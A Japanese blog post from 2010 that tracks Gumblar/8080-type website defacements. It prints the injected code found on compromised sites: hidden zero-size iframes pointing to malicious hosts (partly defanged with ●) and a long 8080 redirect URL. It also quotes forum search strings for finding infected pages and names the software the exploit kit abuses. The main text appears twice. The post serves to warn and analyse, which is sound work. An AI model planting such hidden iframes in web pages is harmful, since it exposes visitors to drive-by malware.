改竄いろいろ ― 2010/01/19 00:09
「GNU GPL」が「LGPL」に置き換わっている一方で、「CODE1」はなにやら実験場のようにいろんな改竄コードが挿入されているような……
KiyoP様よりその改竄の情報を頂いたのですが、難読化コードをそのまま貼られていたので、ウイルス対策ソフトの誤動作防止の意味で削除致しました。
で、その削除したコメントを画像に置き換えたのが次のものです。
その内容は
もう検索しようがないですねぇ……同様の改竄と思われるのが
Bingのキャッシュ(見るときはブラウザのJavaScriptを切ってから)
http://cc.bingj.com/cache.aspx?q=script+code1+try&d=4586565574853043&mkt=ja-JP&setlang=ja-JP&w=415a73d1,318f0160
で見られます。
他にも
www.fitweb.or●jp/~yujima/ (Firefox3以降だと夕方ブロックされるようになりました)
Bingのキャッシュ(見るときはブラウザのJavaScriptを切ってから)
http://cc.bingj.com/cache.aspx?q=www+fitweb+or+jp+yujima&d=4624584623784210&mkt=ja-JP&setlang=ja-JP&w=b2a468a7,721aeb14
KiyoP様によると元々「CODE1」で改竄されていたのが
「また改竄に変化が」と同様の改竄に置き換えられ、更に次の改竄コードが追加されています。
その内容は
ファイル名も前回のin6.phpと似てるし、改竄コードの置き換えに失敗したのでしょうか?
それにしても検索しにくいです。
そして「CODE1」で分かりやすいのですが、ウイルス対策ソフト対策なのでしょうか? <b>タグを挿入したバリエーションがあります。
Bingのキャッシュ(見るときはブラウザのJavaScriptを切ってから)
http://cc.bingj.com/cache.aspx?q=script+code1+try&d=4921057622492158&mkt=ja-JP&setlang=ja-JP&w=f56226e8,544cd66f
こちらは普通に8080
<追記>
【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】 - 2ch.net
ウェブ改ざんとsdra64.exe - 無題なブログ
で4analytics●ws/in.cgi?8の解析をされています。
私はGoogleに飛ばされた時点で追うのをやめました。^^;
</追記>
いつまでこんなことが続くのでしょうか? 困ったものです。
KiyoP様よりその改竄の情報を頂いたのですが、難読化コードをそのまま貼られていたので、ウイルス対策ソフトの誤動作防止の意味で削除致しました。
で、その削除したコメントを画像に置き換えたのが次のものです。
<IFRAME name="StatPage" src="http://iner●kz/index2.php" width=5 height=5 style="display:none">
もう検索しようがないですねぇ……同様の改竄と思われるのが
Bingのキャッシュ(見るときはブラウザのJavaScriptを切ってから)
http://cc.bingj.com/cache.aspx?q=script+code1+try&d=4586565574853043&mkt=ja-JP&setlang=ja-JP&w=415a73d1,318f0160
で見られます。
他にも
www.fitweb.or●jp/~yujima/ (Firefox3以降だと夕方ブロックされるようになりました)
Bingのキャッシュ(見るときはブラウザのJavaScriptを切ってから)
http://cc.bingj.com/cache.aspx?q=www+fitweb+or+jp+yujima&d=4624584623784210&mkt=ja-JP&setlang=ja-JP&w=b2a468a7,721aeb14
KiyoP様によると元々「CODE1」で改竄されていたのが
「また改竄に変化が」と同様の改竄に置き換えられ、更に次の改竄コードが追加されています。
<iframe width=1 height=1 border=0 frameborder=0 src='http://tatumen●com/in8.php'></iframe>
ファイル名も前回のin6.phpと似てるし、改竄コードの置き換えに失敗したのでしょうか?
それにしても検索しにくいです。
そして「CODE1」で分かりやすいのですが、ウイルス対策ソフト対策なのでしょうか? <b>タグを挿入したバリエーションがあります。
Bingのキャッシュ(見るときはブラウザのJavaScriptを切ってから)
http://cc.bingj.com/cache.aspx?q=script+code1+try&d=4921057622492158&mkt=ja-JP&setlang=ja-JP&w=f56226e8,544cd66f
http://clicksor-com.eastmoney.com.mobile-de.homesaleplus●ru:8080/ocn.ne.jp/ocn.ne.jp/classmates.com/linkhelper.cn/google.com/
<追記>
【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】 - 2ch.net
- 50 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/19(火) 14:55:44
■Gumblar&Gumblar.x 現在冬眠中だが、ひっそり動いてるかもしれない ■8080系(巷ではGumblar亜種と呼ばれている) /*GNU GPL*/:進化して/*LGPL*/になった。 /*CODE1*/:現在進化中につき要注意。 世界各地で毎日絶賛バージョンアップ中w ※/*CODE1*/(新型?)の検索は 検索ワード:"document.write(unescape(" "hp_d00(unescape(" 注:GoogleよりBingのほうが絞り込める ■何故かスルーされる亜種っぽいやつ <script>function~:8080系の亜種? 検索ワード:"<script>function" "return String.fromCharCode(c);" "getElementById(" ※ちまちま増えてるから注意が必要
hp_d00はいくらでも変更できるからなぁ……
ウェブ改ざんとsdra64.exe - 無題なブログ
で4analytics●ws/in.cgi?8の解析をされています。
- 2度目はGoogleに飛ばされる
- 「Adobe Reader」「Adobe Flash Player」「Java」「Microsoft MDAC」「Microsoft Office Snapshot Viewer」あたりを悪用
- AdobeやJavaの処理はソフトウェアのバージョンをきっちりチェックして、読み込ませる不正なデータを生成
私はGoogleに飛ばされた時点で追うのをやめました。^^;
</追記>
いつまでこんなことが続くのでしょうか? 困ったものです。
,;r''"~ ̄^'ヽ, ./ ;ヽ l _,,,,,,,,_,;;;;i l l''|~___;;、_y__ lミ;l ネットは戦場! ゙l;| | `'",;_,i`'"|;i | つないだ瞬間 ,r''i ヽ, '~rーj`c=/ 戦場にいることを ,/ ヽ ヽ`ー"/:: `ヽ 忘れる奴が多すぎだぜ!! / ゙ヽ  ̄、::::: ゙l, |;/"⌒ヽ, \ ヽ: _l_ ri ri l l ヽr‐─ヽ_|_⊂////;`ゞ--―─-r| | / | ゙l゙l, l,|`゙゙゙''―ll___l,,l,|,iノ二二二二│`""""""""""""|二;;二二;;二二二i≡二三三l | ヽ ヽ _|_ _ "l ̄ ̄ ̄ ̄ ̄ ̄ |二;;二二;;二=''''''''''' ̄ノ /"ヽ 'j_/ヽヽ, ̄ ,,,/"''''''''''''⊃r‐l'二二二T ̄ ̄ ̄ [i゙''''''''''''''''"゙゙゙ ̄`" / ヽ ー──''''''""(;;) `゙,j" | | | _,,,,,,,,,ヽ、 ,,,,,r-'''''ーー'''| | | | ''" ヽ,,___,,,r‐''''''二__ |__| | | \'''" / ノ | |
コメント
トラックバック
このエントリのトラックバックURL: http://puppet.asablo.jp/blog/2010/01/19/4821551/tb
※なお、送られたトラックバックはブログの管理者が確認するまで公開されません。
コメントをどうぞ
※メールアドレスとURLの入力は必須ではありません。 入力されたメールアドレスは記事に反映されず、ブログの管理者のみが参照できます。
※投稿には管理者が設定した質問に答える必要があります。